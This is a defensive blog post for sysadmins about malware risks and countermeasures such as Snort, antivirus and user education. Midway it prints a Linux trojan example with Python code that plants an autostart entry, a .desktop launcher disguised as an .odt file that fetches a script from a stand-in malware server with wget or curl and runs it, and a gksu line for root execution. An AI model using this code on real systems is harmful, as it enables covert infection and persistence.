Understanding how your network is at risk – Part 1

Your network is at risk! I can tell you that without even analyzing your network. There are threats all around you and your even a threat.

  • Your external or public network gets scanned several times a day by bad people all over the world
  • You receive malicious emails all the time in the form of spam that will lead you to Trojans and viruses.
  • Your web browsing habits make you susceptible to almost any web based attack even if your on a trusted site.

This small series will show you how you are at risk and what you can do. This guide is not complete and will not solve or even address every problem out there. This is written to help you defend properly. It’s a simple collection written for Uber Geeks and Sys Admins.

malwareMalware: Its everywhere. A 8 year old script kitty can write code that will hold your data hostage. A 21 year old college student can insert an invisible iframe in a trusted site that directs you to a malicious file which steals ftp passwords.

It can hijack your browser, redirect your search attempts, serve up nasty pop-up ads, track what web sites you visit, and generally screw things up. Malware programs are usually poorly-programmed and can cause your computer to become unbearably slow and unstable in addition to all the other havoc they wreak. Many of them will reinstall themselves even after you think you have removed them, or hide themselves deep within Windows, making them very difficult to clean.

Malware often comes bundled with other programs (Kazaa, iMesh, and other file sharing programs seem to be the biggest bundlers). These malware programs usually pop-up ads, sending revenue from the ads to the program’s authors. Others are installed from websites, pretending to be software needed to view the website. Still others, most notably some of the CoolWebSearch variants, install themselves through holes in Internet Explorer like a virus would, requiring you to do nothing but visit the wrong web page to get infected. The vast majority, however, must be installed by the user. Unfortunately, getting infected with malware is usually much easier than getting rid of it, and once you get malware on your computer it tends to multiply.

Looking at some open source malware projects its really easy to get your hands on something that will hurt you and your entire network if you do not take precautionary actions.

Using an SQL inject method (example) I can take over a site and insert code that will lead you elsewhere. I could have it automatically redirect in the background without you knowing. Malware will execute and before you know it, my program could listen to your keyboard and report the data back to my server. What’s scary is that lots of malware does the same things and it could be on your computer right now without you knowing.

Malicious emails hit your inbox all the time. Those emails can do really bad things. Take a look at this Linux Trojan that takes advantage of a flaw in Gnome and KDE environments:

import os
   relauncher_str = """
   [Desktop Entry]
   Type=Application
   Name=Malware
   Exec=python .local/.hidden/s.py
   Icon=system-run
   """
   uname = os.getlogin()
   drop_dir = “/home/%s/.config/autostart” % uname
   os.makedirs(drop_dir)
   f = open(drop_dir+”/Malware.desktop”, “w”)
   f.write(relauncher_str)
   f.close()

[Desktop Entry]
   Type=Application
   Name=some_text.odt
   Exec=bash -c ‘URL=http://www.my_malware_server.com/s.py ;
                            DROP=~/.local/.hidden ;
mkdir -p $DROP;
if [ -e /usr/bin/wget ] ;
then wget $URL -O $DROP/s.py ;
else curl $URL -o $DROP/s.py ; fi;
python $DROP/s.py’
Icon=/usr/share/icons/hicolor/48×48/apps/ooo-writer.png

Even this simple code will execute a script with root privileges

Exec=gksu python .local/.hidden/s.py

Solution:

Implement scanning in y0ur border gateway such as SNORT. Snort looks for signatures and drops packets containing those packet signatures. IPCop and pfsense utilize snort as an add-on to watch incoming and outgoing traffic.

Scan your PC for malware often. Avast and Spybot S&D are excellent software solutions. Run them both. Let SpyBot immunize you from bad sites.

Run updated AV on all clients. Symantec, need I say more.

Don’t blindly click on attachments that people have sent you. Even on Linux this advice should be taken serious.

Kill the Windows Messenger service.

Be skeptical of what you download and install. There are lots of great programs out there. Don’t install anything that looks suspicious or out of place. Research the software before installing it. Scan it, try Virus Total before you install an application or downloaded game. Don’t install a required Codec for a video that you downloaded. Use a trusted Codec pack. Verify that your Internet Explorer security settings are set correctly. Disable Active-X for un-trusted sites. Run No-Script with Firefox!

Always keep your software up to date. Run Windows Update often. Always install a Windows update. Sometimes they will be zero day patches.

And always run a firewall on every client and server. I would even block global bad IPs on the border gateway. Take a look at your hosts file after you have been immunized from SpyBot S&D, use this as a template for your border gateway.

Lastly educate your users. Internal threats are worse then external. Educate users to minimize infections and network problems.

 

 

Next Network scanning, brute force, and sniffing.

Leave a Reply

Your email address will not be published. Required fields are marked *